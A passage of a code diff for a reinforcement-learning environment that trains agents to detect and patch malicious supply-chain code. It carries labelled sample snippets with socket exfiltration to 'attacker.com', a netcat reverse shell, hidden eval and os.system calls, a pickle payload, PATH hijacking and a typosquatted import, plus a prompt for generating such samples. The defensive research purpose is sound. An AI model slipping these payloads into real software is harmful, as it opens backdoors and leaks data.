+        "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef caesar_cipher(text, shift):\n    \"\"\"Apply Caesar cipher to text.\"\"\"\n    result = \"\"\n    for char in text:\n        if char.isalpha():\n            start = ord('a') if char.islower() else ord('A')\n            result += chr((ord(char) - start + shift) % 26 + start)\n        else:\n            result += char\n    return result",
+        "patch": "def caesar_cipher(text, shift):\n    \"\"\"Apply Caesar cipher to text.\"\"\"\n    result = \"\"\n    for char in text:\n        if char.isalpha():\n            start = ord('a') if char.islower() else ord('A')\n            result += chr((ord(char) - start + shift) % 26 + start)\n        else:\n            result += char\n    return result",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "env_hijack"
+    },
+    {
+        "id": "tp_4112a517",
+        "type": "true_positive",
+        "code_snippet": "import socket\ntry:\n    s = socket.socket()\n    s.connect(('attacker.com', 80))\n    s.sendall(b'exfiltrated data')\nexcept:\n    pass\n\ndef read_ini_config(content):\n    \"\"\"Read a simple INI configuration.\"\"\"\n    config = {}\n    current_section = None\n    for line in content.split('\\n'):\n        line = line.strip()\n        if not line or line.startswith('#'):\n            continue\n        if line.startswith('[') and line.endswith(']'):\n            current_section = line[1:-1]\n            config[current_section] = {}\n        elif '=' in line and current_section:\n            key, val = line.split('=', 1)\n            config[current_section][key.strip()] = val.strip()\n    return config",
+        "patch": "def read_ini_config(content):\n    \"\"\"Read a simple INI configuration.\"\"\"\n    config = {}\n    current_section = None\n    for line in content.split('\\n'):\n        line = line.strip()\n        if not line or line.startswith('#'):\n            continue\n        if line.startswith('[') and line.endswith(']'):\n            current_section = line[1:-1]\n            config[current_section] = {}\n        elif '=' in line and current_section:\n            key, val = line.split('=', 1)\n            config[current_section][key.strip()] = val.strip()\n    return config",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "socket_exfil"
+    },
+    {
+        "id": "fp_1a5da2e5",
+        "type": "false_positive",
+        "code_snippet": "import base64\ndef encode_msg(msg):\n    return base64.b64encode(msg.encode())\n\ndef format_iso_date(year, month, day):\n    \"\"\"Format date components into an ISO 8601 string.\"\"\"\n    return f\"{year:04d}-{month:02d}-{day:02d}\"",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_3fa65759",
+        "type": "true_positive",
+        "code_snippet": "import socket\ntry:\n    s = socket.socket()\n    s.connect(('attacker.com', 80))\n    s.sendall(b'exfiltrated data')\nexcept:\n    pass\n\ndef caesar_cipher(text, shift):\n    \"\"\"Apply Caesar cipher to text.\"\"\"\n    result = \"\"\n    for char in text:\n        if char.isalpha():\n            start = ord('a') if char.islower() else ord('A')\n            result += chr((ord(char) - start + shift) % 26 + start)\n        else:\n            result += char\n    return result",
+        "patch": "def caesar_cipher(text, shift):\n    \"\"\"Apply Caesar cipher to text.\"\"\"\n    result = \"\"\n    for char in text:\n        if char.isalpha():\n            start = ord('a') if char.islower() else ord('A')\n            result += chr((ord(char) - start + shift) % 26 + start)\n        else:\n            result += char\n    return result",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "socket_exfil"
+    },
+    {
+        "id": "fn_c40125ae",
+        "type": "functional",
+        "code_snippet": "def read_ini_config(content):\n    \"\"\"Read a simple INI configuration.\"\"\"\n    config = {}\n    current_section = None\n    for line in content.split('\\n'):\n        line = line.strip()\n        if not line or line.startswith('#'):\n            continue\n        if line.startswith('[') and line.endswith(']'):\n            current_section = line[1:-1]\n            config[current_section] = {}\n        elif '=' in line and current_section:\n            key, val = line.split('=', 1)\n            config[current_section][key.strip()] = val.strip()\n    return config",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_7ac28ccc",
+        "type": "true_positive",
+        "code_snippet": "def safe_eval(x):\n    return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef format_iso_date(year, month, day):\n    \"\"\"Format date components into an ISO 8601 string.\"\"\"\n    return f\"{year:04d}-{month:02d}-{day:02d}\"",
+        "patch": "def format_iso_date(year, month, day):\n    \"\"\"Format date components into an ISO 8601 string.\"\"\"\n    return f\"{year:04d}-{month:02d}-{day:02d}\"",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "eval_hidden"
+    },
+    {
+        "id": "tp_e1848067",
+        "type": "true_positive",
+        "code_snippet": "import pickle\npickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\ndef basic_calculator(a, b, op):\n    \"\"\"Perform a basic math operation.\"\"\"\n    if op == '+':\n        return a + b\n    elif op == '-':\n        return a - b\n    elif op == '*':\n        return a * b\n    elif op == '/':\n        if b == 0:\n            raise ValueError(\"Division by zero\")\n        return a / b\n    return None",
+        "patch": "def basic_calculator(a, b, op):\n    \"\"\"Perform a basic math operation.\"\"\"\n    if op == '+':\n        return a + b\n    elif op == '-':\n        return a - b\n    elif op == '*':\n        return a * b\n    elif op == '/':\n        if b == 0:\n            raise ValueError(\"Division by zero\")\n        return a / b\n    return None",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "pickle_deserialization"
+    },
+    {
+        "id": "fp_382449d8",
+        "type": "false_positive",
+        "code_snippet": "import base64\ndef encode_msg(msg):\n    return base64.b64encode(msg.encode())\n\ndef read_ini_config(content):\n    \"\"\"Read a simple INI configuration.\"\"\"\n    config = {}\n    current_section = None\n    for line in content.split('\\n'):\n        line = line.strip()\n        if not line or line.startswith('#'):\n            continue\n        if line.startswith('[') and line.endswith(']'):\n            current_section = line[1:-1]\n            config[current_section] = {}\n        elif '=' in line and current_section:\n            key, val = line.split('=', 1)\n            config[current_section][key.strip()] = val.strip()\n    return config",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fp_5448737e",
+        "type": "false_positive",
+        "code_snippet": "import requests\n# Just checking internet\ntry:\n    requests.get('https://8.8.8.8', timeout=1)\nexcept:\n    pass\n\ndef format_iso_date(year, month, day):\n    \"\"\"Format date components into an ISO 8601 string.\"\"\"\n    return f\"{year:04d}-{month:02d}-{day:02d}\"",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_067c7620",
+        "type": "true_positive",
+        "code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef basic_calculator(a, b, op):\n    \"\"\"Perform a basic math operation.\"\"\"\n    if op == '+':\n        return a + b\n    elif op == '-':\n        return a - b\n    elif op == '*':\n        return a * b\n    elif op == '/':\n        if b == 0:\n            raise ValueError(\"Division by zero\")\n        return a / b\n    return None",
+        "patch": "def basic_calculator(a, b, op):\n    \"\"\"Perform a basic math operation.\"\"\"\n    if op == '+':\n        return a + b\n    elif op == '-':\n        return a - b\n    elif op == '*':\n        return a * b\n    elif op == '/':\n        if b == 0:\n            raise ValueError(\"Division by zero\")\n        return a / b\n    return None",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "malicious_import"
+    },
+    {
+        "id": "tp_30239b19",
+        "type": "true_positive",
+        "code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef render_template(template, context):\n    \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n    result = template\n    for key, value in context.items():\n        result = result.replace(f\"{{{{{key}}}}}\", str(value))\n    return result",
+        "patch": "def render_template(template, context):\n    \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n    result = template\n    for key, value in context.items():\n        result = result.replace(f\"{{{{{key}}}}}\", str(value))\n    return result",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "malicious_import"
+    },
+    {
+        "id": "fn_cf514ff8",
+        "type": "functional",
+        "code_snippet": "class Node:\n    def __init__(self, data):\n        self.data = data\n        self.next = None\n\nclass LinkedList:\n    \"\"\"A simple linked list.\"\"\"\n    def __init__(self):\n        self.head = None\n        \n    def append(self, data):\n        new_node = Node(data)\n        if not self.head:\n            self.head = new_node\n            return\n        last = self.head\n        while last.next:\n            last = last.next\n        last.next = new_node",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_b9c23fd5",
+        "type": "true_positive",
+        "code_snippet": "import pythonn\n\ndef is_anagram(s1, s2):\n    \"\"\"Check if two strings are anagrams.\"\"\"\n    return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
+        "patch": "def is_anagram(s1, s2):\n    \"\"\"Check if two strings are anagrams.\"\"\"\n    return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "typosquatting"
+    },
+    {
+        "id": "tp_18963f71",
+        "type": "true_positive",
+        "code_snippet": "def safe_eval(x):\n    return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef generate_slug(title):\n    \"\"\"Generate a URL-friendly slug.\"\"\"\n    import re\n    title = title.lower()\n    title = re.sub(r'[^a-z0-9\\s-]', '', title)\n    return re.sub(r'[\\s-]+', '-', title).strip('-')",
+        "patch": "def generate_slug(title):\n    \"\"\"Generate a URL-friendly slug.\"\"\"\n    import re\n    title = title.lower()\n    title = re.sub(r'[^a-z0-9\\s-]', '', title)\n    return re.sub(r'[\\s-]+', '-', title).strip('-')",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "eval_hidden"
+    },
+    {
+        "id": "tp_4c4f927a",
+        "type": "true_positive",
+        "code_snippet": "import subprocess\ntry:\n    subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\nexcept:\n    pass\n\ndef generate_slug(title):\n    \"\"\"Generate a URL-friendly slug.\"\"\"\n    import re\n    title = title.lower()\n    title = re.sub(r'[^a-z0-9\\s-]', '', title)\n    return re.sub(r'[\\s-]+', '-', title).strip('-')",
+        "patch": "def generate_slug(title):\n    \"\"\"Generate a URL-friendly slug.\"\"\"\n    import re\n    title = title.lower()\n    title = re.sub(r'[^a-z0-9\\s-]', '', title)\n    return re.sub(r'[\\s-]+', '-', title).strip('-')",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "subprocess_backdoor"
+    },
+    {
+        "id": "tp_4ea9d228",
+        "type": "true_positive",
+        "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef word_count(text):\n    \"\"\"Count occurrences of words in text.\"\"\"\n    words = text.split()\n    counts = {}\n    for word in words:\n        counts[word] = counts.get(word, 0) + 1\n    return counts",
+        "patch": "def word_count(text):\n    \"\"\"Count occurrences of words in text.\"\"\"\n    words = text.split()\n    counts = {}\n    for word in words:\n        counts[word] = counts.get(word, 0) + 1\n    return counts",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "env_hijack"
+    },
+    {
+        "id": "tp_f417c9df",
+        "type": "true_positive",
+        "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef is_prime(n):\n    \"\"\"Check if a number is prime.\"\"\"\n    if n <= 1:\n        return False\n    for i in range(2, int(n ** 0.5) + 1):\n        if n % i == 0:\n            return False\n    return True",
+        "patch": "def is_prime(n):\n    \"\"\"Check if a number is prime.\"\"\"\n    if n <= 1:\n        return False\n    for i in range(2, int(n ** 0.5) + 1):\n        if n % i == 0:\n            return False\n    return True",
+        "unit_test_code": "import code\nassert code.is_prime(7) == True\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "env_hijack"
+    },
+    {
+        "id": "tp_bde0820e",
+        "type": "true_positive",
+        "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef parse_csv(csv_content):\n    \"\"\"Parse simple CSV content.\"\"\"\n    lines = csv_content.strip().split('\\n')\n    if not lines:\n        return []\n    headers = lines[0].split(',')\n    result = []\n    for line in lines[1:]:\n        values = line.split(',')\n        result.append(dict(zip(headers, values)))\n    return result",
+        "patch": "def parse_csv(csv_content):\n    \"\"\"Parse simple CSV content.\"\"\"\n    lines = csv_content.strip().split('\\n')\n    if not lines:\n        return []\n    headers = lines[0].split(',')\n    result = []\n    for line in lines[1:]:\n        values = line.split(',')\n        result.append(dict(zip(headers, values)))\n    return result",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "env_hijack"
+    },
+    {
+        "id": "fn_d6a7e145",
+        "type": "functional",
+        "code_snippet": "class Node:\n    def __init__(self, data):\n        self.data = data\n        self.next = None\n\nclass LinkedList:\n    \"\"\"A simple linked list.\"\"\"\n    def __init__(self):\n        self.head = None\n        \n    def append(self, data):\n        new_node = Node(data)\n        if not self.head:\n            self.head = new_node\n            return\n        last = self.head\n        while last.next:\n            last = last.next\n        last.next = new_node",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_69568e28",
+        "type": "true_positive",
+        "code_snippet": "import socket\ntry:\n    s = socket.socket()\n    s.connect(('attacker.com', 80))\n    s.sendall(b'exfiltrated data')\nexcept:\n    pass\n\ndef generate_slug(title):\n    \"\"\"Generate a URL-friendly slug.\"\"\"\n    import re\n    title = title.lower()\n    title = re.sub(r'[^a-z0-9\\s-]', '', title)\n    return re.sub(r'[\\s-]+', '-', title).strip('-')",
+        "patch": "def generate_slug(title):\n    \"\"\"Generate a URL-friendly slug.\"\"\"\n    import re\n    title = title.lower()\n    title = re.sub(r'[^a-z0-9\\s-]', '', title)\n    return re.sub(r'[\\s-]+', '-', title).strip('-')",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "socket_exfil"
+    },
+    {
+        "id": "fn_7abd4b1e",
+        "type": "functional",
+        "code_snippet": "def basic_calculator(a, b, op):\n    \"\"\"Perform a basic math operation.\"\"\"\n    if op == '+':\n        return a + b\n    elif op == '-':\n        return a - b\n    elif op == '*':\n        return a * b\n    elif op == '/':\n        if b == 0:\n            raise ValueError(\"Division by zero\")\n        return a / b\n    return None",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fp_56b026a4",
+        "type": "false_positive",
+        "code_snippet": "def safe_calc(expr):\n    # Legit eval in controlled env\n    return eval(expr, {'__builtins__': {}}, {})\n\ndef parse_logs(log_lines):\n    \"\"\"Parse simple log lines into level and message.\"\"\"\n    parsed = []\n    for line in log_lines:\n        parts = line.split(' - ', 1)\n        if len(parts) == 2:\n            parsed.append({\"level\": parts[0].strip('[]'), \"message\": parts[1]})\n    return parsed",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fn_9691b992",
+        "type": "functional",
+        "code_snippet": "def is_anagram(s1, s2):\n    \"\"\"Check if two strings are anagrams.\"\"\"\n    return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fp_477c7ba9",
+        "type": "false_positive",
+        "code_snippet": "def safe_calc(expr):\n    # Legit eval in controlled env\n    return eval(expr, {'__builtins__': {}}, {})\n\ndef read_ini_config(content):\n    \"\"\"Read a simple INI configuration.\"\"\"\n    config = {}\n    current_section = None\n    for line in content.split('\\n'):\n        line = line.strip()\n        if not line or line.startswith('#'):\n            continue\n        if line.startswith('[') and line.endswith(']'):\n            current_section = line[1:-1]\n            config[current_section] = {}\n        elif '=' in line and current_section:\n            key, val = line.split('=', 1)\n            config[current_section][key.strip()] = val.strip()\n    return config",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fp_f65258dd",
+        "type": "false_positive",
+        "code_snippet": "import requests\n# Just checking internet\ntry:\n    requests.get('https://8.8.8.8', timeout=1)\nexcept:\n    pass\n\ndef celsius_to_fahrenheit(c):\n    \"\"\"Convert Celsius to Fahrenheit.\"\"\"\n    return (c * 9/5) + 32\n\ndef fahrenheit_to_celsius(f):\n    \"\"\"Convert Fahrenheit to Celsius.\"\"\"\n    return (f - 32) * 5/9",
+        "patch": null,
+        "unit_test_code": "import code\nassert code.celsius_to_fahrenheit(0) == 32\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fn_7ed224be",
+        "type": "functional",
+        "code_snippet": "def render_template(template, context):\n    \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n    result = template\n    for key, value in context.items():\n        result = result.replace(f\"{{{{{key}}}}}\", str(value))\n    return result",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_6523f26b",
+        "type": "true_positive",
+        "code_snippet": "def safe_eval(x):\n    return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef is_anagram(s1, s2):\n    \"\"\"Check if two strings are anagrams.\"\"\"\n    return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
+        "patch": "def is_anagram(s1, s2):\n    \"\"\"Check if two strings are anagrams.\"\"\"\n    return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "eval_hidden"
+    }
+]
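
The records above share one schema, and in the entries shown here every `malicious` record carries a non-null `patch` and `attack_type`, while every `benign` record has both set to `null`. A minimal sketch of a consistency check built on that observation follows; `check_scenario` and `summarize` are hypothetical helpers, not part of the repository, and the invariants are assumptions inferred from the visible records only.

```python
from collections import Counter

# Keys that every record in scenarios.json appears to carry.
REQUIRED_KEYS = {
    "id", "type", "code_snippet", "patch",
    "unit_test_code", "label", "source", "attack_type",
}


def check_scenario(scenario):
    """Return a list of problems found in one scenario record (hypothetical helper)."""
    missing = REQUIRED_KEYS - scenario.keys()
    if missing:
        return [f"missing keys: {sorted(missing)}"]
    problems = []
    # Assumed invariant: malicious records ship a reference patch.
    if scenario["label"] == "malicious" and not scenario["patch"]:
        problems.append("malicious scenario without a patch")
    # Assumed invariant: benign records have no attack category.
    if scenario["label"] == "benign" and scenario["attack_type"] is not None:
        problems.append("benign scenario with an attack_type")
    return problems


def summarize(scenarios):
    """Count records per (type, label) pair."""
    return Counter((s["type"], s["label"]) for s in scenarios)
```

Running `check_scenario` over the loaded JSON before training would surface malformed records early instead of inside a reward computation.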

sentinel_synth/data/sdk_config.yaml ADDED

	@@ -0,0 +1,33 @@

+# Meta Synthetic Data Kit Configuration for Sentinel-Synth
+# This file defines how the SDK should generate synthetic vulnerabilities.
+vllm:
+  api_base: "http://localhost:8000/v1"
+  model: "meta-llama/Llama-3.1-8B-Instruct"
+generation:
+  temperature: 0.8
+  top_p: 0.95
+  max_tokens: 1024
+  num_pairs: 5          # Number of examples per ingest chunk
+prompts:
+  # Standard prompt for generating malicious supply-chain code
+  code_generation: |
+    You are a cybersecurity research assistant specializing in supply-chain security.
+    Generate a Python script that contains a subtle, realistic supply-chain vulnerability.
+    The vulnerability should be one of:
+    - Typosquatting (importing a malicious package similar to a popular one)
+    - Obfuscated execution (exec/eval with base64/zlib encoding)
+    - Environment hijacking (modifying PATH or other critical env vars)
+    - Subprocess backdoors (reverse shells or hidden command execution)
+    - Malicious __import__ tricks
+    After the code, provide a 'patch' that fixes the vulnerability without breaking functionality.
+    Also, provide a 'unit_test_code' that fails on the malicious version but passes on the patched version.
+    Format the output as a JSON object with keys:
+    - code_snippet: the vulnerable code
+    - patch: the fixed code
+    - unit_test_code: the validation test
+    - attack_type: the category of the attack
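
The prompt above asks the model for a JSON object with four keys, but model responses often wrap the JSON in extra prose or omit a field. A minimal sketch of a defensive parser is shown below; `parse_generated_record` is a hypothetical helper and not part of the Synthetic Data Kit or this repository.

```python
import json

# The four keys requested by the code_generation prompt.
EXPECTED_KEYS = ("code_snippet", "patch", "unit_test_code", "attack_type")


def parse_generated_record(raw_text):
    """Extract the JSON object from a model response; return None if unusable."""
    # Take the span from the first '{' to the last '}' to skip surrounding prose.
    start, end = raw_text.find("{"), raw_text.rfind("}")
    if start == -1 or end <= start:
        return None
    try:
        record = json.loads(raw_text[start:end + 1])
    except json.JSONDecodeError:
        return None
    if not isinstance(record, dict):
        return None
    # Every requested key must be present as a non-empty string.
    for key in EXPECTED_KEYS:
        value = record.get(key)
        if not isinstance(value, str) or not value.strip():
            return None
    return record
```

Records that return `None` can simply be dropped before they reach `scenarios.json`.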

sentinel_synth/envs/__init__.py ADDED

File without changes

sentinel_synth/envs/sentinel_env.py ADDED

	@@ -0,0 +1,175 @@

+import gymnasium as gym
+from gymnasium import spaces
+import json
+import numpy as np
+from pathlib import Path
+import random
+from ..validation.docker_runner import run_code
+from ..validation.patch_validator import validate_patch
+class SentinelEnv(gym.Env):
+    """
+    Gymnasium environment for Sentinel-Synth
+    """
+    metadata = {"render_modes": ["human"]}
+    ACTION_ANALYZE = 0
+    ACTION_EXECUTE_SANDBOX = 1
+    ACTION_BLOCK_PR = 2
+    ACTION_SUBMIT_PATCH = 3
+    ACTION_REQUEST_REVIEW = 4
+    def __init__(self, scenarios_path="sentinel_synth/data/scenarios.json", use_docker=False):
+        super().__init__()
+        self.use_docker = use_docker
+        self.scenarios_path = scenarios_path
+        self.scenarios = self._load_scenarios()
+        self.current_scenario = None
+        self.step_counter = 0
+        self.max_steps = 5
+        # Define Observation Space
+        # text max length 5000 chars
+        self.observation_space = spaces.Dict(
+            {
+                "code_snippet": spaces.Text(max_length=5000, charset="".join(gym.spaces.text.alphanumeric) + " \n\t\r!@#$%^&*()_+-=[]{}|;':\",.<>/?\\"),
+                "static_flags": spaces.Box(low=0, high=1, shape=(5,), dtype=np.int32),
+                "risk_score": spaces.Box(low=0.0, high=1.0, shape=(1,), dtype=np.float32),
+            }
+        )
+        # Define Action Space
+        self.action_space = spaces.Discrete(5)
+    def _load_scenarios(self):
+        try:
+            with open(self.scenarios_path, "r") as f:
+                return json.load(f)
+        except Exception as e:
+            print(f"Warning: Could not load scenarios from {self.scenarios_path}: {e}")
+            return []
+    def _compute_static_flags(self, code_snippet: str):
+        flags = np.zeros(5, dtype=np.int32)
+        if "eval(" in code_snippet or "exec(" in code_snippet:
+            flags[0] = 1
+        if "subprocess" in code_snippet or "os.system" in code_snippet:
+            flags[1] = 1
+        if "socket" in code_snippet or "requests" in code_snippet:
+            flags[2] = 1
+        if "os.environ" in code_snippet:
+            flags[3] = 1
+        if "base64" in code_snippet or "zlib" in code_snippet:
+            flags[4] = 1
+        return flags
+    def _get_obs(self):
+        code = self.current_scenario["code_snippet"]
+        # truncate code to 5000 chars to fit text space
+        if len(code) > 5000:
+            code = code[:5000]
+        flags = self._compute_static_flags(code)
+        risk_score = np.array([np.sum(flags) / 5.0], dtype=np.float32)
+        return {
+            "code_snippet": code,
+            "static_flags": flags,
+            "risk_score": risk_score
+        }
+    def reset(self, seed=None, options=None):
+        super().reset(seed=seed)
+        if not self.scenarios:
+            # Fallback if no scenarios to prevent crash
+            self.current_scenario = {
+                "id": "fallback", "type": "functional", "label": "benign",
+                "code_snippet": "print('hello')", "patch": None
+            }
+        else:
+            # We can optionally pass a specific scenario via options
+            if options and "scenario" in options:
+                self.current_scenario = options["scenario"]
+            else:
+                # Use the env's seeded RNG so reset(seed=...) is reproducible
+                idx = int(self.np_random.integers(len(self.scenarios)))
+                self.current_scenario = self.scenarios[idx]
+        self.step_counter = 0
+        self.last_action = None
+        self.last_reward = 0
+        return self._get_obs(), {}
+    def step(self, action):
+        self.step_counter += 1
+        reward = 0
+        done = False
+        info = {}
+        self.last_action = action
+        if action == self.ACTION_ANALYZE:
+            # Small exploration reward for analyzing
+            reward = 0.05
+            info = {"analysis": "Static analysis reveals potential injection points if untrusted input is passed."}
+        elif action == self.ACTION_EXECUTE_SANDBOX:
+            # Execute code snippet
+            result = run_code(self.current_scenario["code_snippet"], timeout_sec=3, use_docker=self.use_docker)
+            info = {"telemetry": result}
+            # Shaped reward for gathering info
+            reward = 0.1
+        elif action == self.ACTION_BLOCK_PR:
+            if self.current_scenario["label"] == "malicious":
+                reward = 1.5 # Correctly blocked
+            else:
+                reward = -2.0 # False positive block
+            done = True
+        elif action == self.ACTION_SUBMIT_PATCH:
+            scenario_patch = self.current_scenario.get("patch")
+            if not scenario_patch:
+                if self.current_scenario["label"] == "benign":
+                    # Benign code doesn't need a patch, but submitting one is a mistake
+                    reward = -1.0
+                else:
+                    # Should have a patch for malicious, but it's missing in scenario?
+                    reward = -0.5
+            else:
+                success, msg, details = validate_patch(self.current_scenario, scenario_patch, use_docker=self.use_docker)
+                info = {"validation_success": success, "msg": msg, "details": details}
+                if success:
+                    if self.current_scenario["label"] == "malicious":
+                        reward = 4.0 # High reward for fixing vulnerability
+                    else:
+                        reward = -2.5 # High penalty for breaking benign code
+                else:
+                    reward = -1.5 # Patch failed validation
+            done = True
+        elif action == self.ACTION_REQUEST_REVIEW:
+            if self.current_scenario["type"] == "false_positive":
+                reward = 0.5 # Good choice for ambiguous cases
+            else:
+                reward = 0.0
+            done = True
+            info = {"review_requested": True}
+        # Check max steps
+        if self.step_counter >= self.max_steps and not done:
+            reward -= 0.5 # Penalty for timeout
+            done = True
+        self.last_reward = reward
+        return self._get_obs(), reward, done, False, info
+    def render(self):
+        print(f"Step: {self.step_counter} | Action: {self.last_action} | Reward: {self.last_reward}")
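
The observation's `static_flags` and `risk_score` come from plain substring checks, so it helps to see what they report on the shipped scenarios. The sketch below mirrors the substring groups of `_compute_static_flags` in pure Python, without Gymnasium or NumPy; `static_flags` and `risk_score` here are standalone illustrative functions, not the environment's own methods.

```python
# Substring groups mirrored from SentinelEnv._compute_static_flags.
FLAG_PATTERNS = [
    ("eval(", "exec("),            # flag 0: dynamic execution
    ("subprocess", "os.system"),   # flag 1: process spawning
    ("socket", "requests"),        # flag 2: network access
    ("os.environ",),               # flag 3: environment access
    ("base64", "zlib"),            # flag 4: encoding / compression
]


def static_flags(code_snippet):
    """Return one 0/1 flag per pattern group."""
    return [int(any(p in code_snippet for p in group)) for group in FLAG_PATTERNS]


def risk_score(code_snippet):
    """Fraction of flags that fired, in [0.0, 1.0]."""
    flags = static_flags(code_snippet)
    return sum(flags) / len(flags)


# Attack prefix of the "malicious_import" scenarios.
malicious = "__import__('os').system('echo pwned > /tmp/pwned')"
# Prefix of the benign "safe_calc" false-positive scenarios.
benign = "def safe_calc(expr):\n    return eval(expr, {'__builtins__': {}}, {})"

print(static_flags(malicious), risk_score(malicious))  # [0, 0, 0, 0, 0] 0.0
print(static_flags(benign), risk_score(benign))        # [1, 0, 0, 0, 0] 0.2
```

The `malicious_import` prefix fires no flag because the text `os').system` never contains the literal substring `os.system`, while the benign `safe_calc` helper scores higher. An agent therefore cannot rely on `risk_score` alone, and a policy that acts only when the score exceeds 0.5 needs at least three flags to fire.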

sentinel_synth/tests/__init__.py ADDED

File without changes

sentinel_synth/tests/test_validator.py ADDED

	@@ -0,0 +1,57 @@

+import pytest
+from sentinel_synth.validation.patch_validator import validate_patch
+def test_syntax_error_detected():
+    scenario = {"type": "functional", "code_snippet": "print('hello')", "unit_test_code": None}
+    patch = "print('hello"  # Missing closing quote
+    success, msg, details = validate_patch(scenario, patch, use_docker=False)
+    assert success is False
+    assert msg == "Syntax error"
+    assert "error" in details
+def test_unit_test_pass():
+    scenario = {
+        "type": "functional",
+        "code_snippet": "def add(a, b): return a + b",
+        "unit_test_code": "import code\nassert code.add(1, 2) == 3\n"
+    }
+    patch = "def add(a, b):\n    return a + b\n"
+    success, msg, details = validate_patch(scenario, patch, use_docker=False)
+    assert success is True
+    assert msg == "Patch is valid"
+def test_unit_test_fail():
+    scenario = {
+        "type": "functional",
+        "code_snippet": "def add(a, b): return a + b",
+        "unit_test_code": "import code\nassert code.add(1, 2) == 3\n"
+    }
+    # Breaking the functionality in the patch
+    patch = "def add(a, b):\n    return a - b\n"
+    success, msg, details = validate_patch(scenario, patch, use_docker=False)
+    assert success is False
+    assert msg == "Unit test failed"
+    assert "test_output" in details
+def test_vulnerability_remains():
+    # Attack injects a hidden print which simulates a backdoor
+    scenario = {
